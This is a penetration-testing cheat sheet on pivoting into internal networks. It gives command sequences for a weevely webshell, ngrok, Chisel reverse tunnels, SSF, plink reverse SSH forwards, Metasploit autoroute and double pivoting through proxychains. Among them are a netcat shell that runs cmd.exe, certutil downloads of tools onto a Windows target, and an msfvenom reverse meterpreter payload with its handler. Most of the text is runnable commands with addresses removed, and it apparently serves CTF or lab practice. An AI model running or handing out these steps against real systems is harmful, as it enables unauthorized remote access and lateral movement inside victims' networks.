Nmap pivoting

Use nmap standalone binary to scan other machines on the internal network. This is the best option to scan large networks without proxy all the traffic.

Pivoting with weevely via webshell

:net_proxy - Run local proxy to pivot HTTP/HTTPS browsing through the target.
:net_scan - TCP Port scan.


vim ~/.ngrok2/ngrok.yml
addr: 8080
proto: http
addr: 8181
proto: tcp
addr: 8282
proto: tcp
./ngrok start -all


Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.

--pivoting remote service--
Kali box:
Target box:
kali:> ./chisel server -p 8000 --host --reverse -v
target box:> chisel_windows.exe client R:8081:
kali:> curl localhost:8001
target box:> chisel_windows.exe client R:8445:
kali :> nmap -sT -Pn -p 8445 -v
--socks tunnel--
kali:> ./chisel server -p 8000 --reverse -v
target:> chisel_windows.exe client R:8001:
target:> chisel_windows.exe server -p 9001 --socks5
kali:> ./chisel client localhost:8001 socks
kali:> vim /etc/proxychains
socks5 1080
proxychains curl


Secure Socket Funneling (SSF) is a network tool and toolkit. It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS tunnel to a remote computer.

1. We need to upload the certifications into the target machine 2. Download the windows and Linux binaries from GitHub repository 3. Execute the ssfd (server) on the Linux side

[2019-09-03T10:34:41-04:00] [info] [config] [tls] CA cert path: <file: ./certs/trusted/ca.crt>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] cert path: <file: ./certs/certificate.crt>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] key path: <file: ./certs/private.key>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] key password: <>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] dh path: <file: ./certs/dh4096.pem>
[2019-09-03T10:34:41-04:00] [info] [config] [tls] cipher suite: <DHE-RSA-AES256-GCM-SHA384>
[2019-09-03T10:34:41-04:00] [info] [config] [http proxy] <None>
[2019-09-03T10:34:41-04:00] [info] [config] [socks proxy] <None>
[2019-09-03T10:34:41-04:00] [info] [config] [circuit] <None>
[2019-09-03T10:34:41-04:00] [info] [ssfd] listening on <*:8011>
[2019-09-03T10:34:41-04:00] [info] [ssfd] running (Ctrl + C to stop)

4. Upload the certificates and ssf client into the target machine (windows)

certutil.exe -urlcache -split -f ssf.exe
certutil.exe -urlcache -split -f certs.zip
Download 7zip command line
:> 7za E certs.zip
./ssf -g -F 1080 -Y 1111 -L -L

On target host I will start the client, telling it to connect back to my box. I’ll use the following options:

-g - allow gateway ports. This allows client to bind local sockets to address besides localhost. -F 1080 - This runs a socks proxy on the server on port 1080. -Y 1111 - This opens local port 1111 as a shell on the client. -L and -L - These will open listeners on the target machine that will forwards back to my attacker box. This will come in handy when I want to exploit further machines that can’t talk to my attacker box directly.

ssf.exe -g -F 1080 -Y 1111
kali:> vim /etc/proxychains
socks5 1080
proxychains curl

Reference: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html


:> service ssh restart
:> netstat -antp | grep 22
:> adduser pp
:> userdel –r pp (to delete the created user)
nc.exe 4444 -e cmd.exe
plink.exe -ssh [email protected] -R 3306:localhost:3306
plink.exe -l pp -R 445:
plink -R 445:localhost:445 -pw pp [email protected] -N
plink.exe -R 8081:localhost:445 [email protected] -N -v

Ensure that kali linux is allowing port-forwarding:

vim /etc/ssh/sshd_config
GatewayPorts yes
Reference: https://hackso.me/bighead-htb-walkthrough/

Metasploit tunnel

Create the payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f exe -o meterpreter.exe

Start the listener

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 443
handler -H -P 443 -p windows/meterpreter/reverse_tcp

Type "background" to put the section in the 2nd plane

Add the route and session (1)

route add 1

Verify the route: route print

Create the socks4 proxy

use auxiliary/server/socks4a

Configure proxychains

vim /etc/proxychains.conf
Edit the ProxyList at the bottom of the file:
socks4 1080

Run your commands

proxychains nmap -Pn -sT -p445,3389
proxychains rdesktop
proxychains firefox

Auto-route MSF (double pivot)

Imagine you have "www" access to a web-server located at the DMZ. With this technique, you can pivot through the infrastructure easily via Internet without exposing ports in your home-router.

:> ifconfig
:> run autoroute -s ip/mask
:> search socks4
:> run (1080)
search exploit

Double pivoting with proxychains

First, create a dynamic port forwarding through the first network:
ssh -f -N -D 9050 [email protected]
Edit /etc/proxychains.conf and add as default gateway:
socks4 9050
Use the proxy to create a second dynamic port forward to the second network:
proxychains ssh -f -N -D 10050 [email protected] -p 22
Edit again /etc/proxychains.conf and add as default gateway:
socks4 10050
You can now use proxychains to pivot to the target network:
proxychains nmap -sTV -n -PN -254

Pivoting references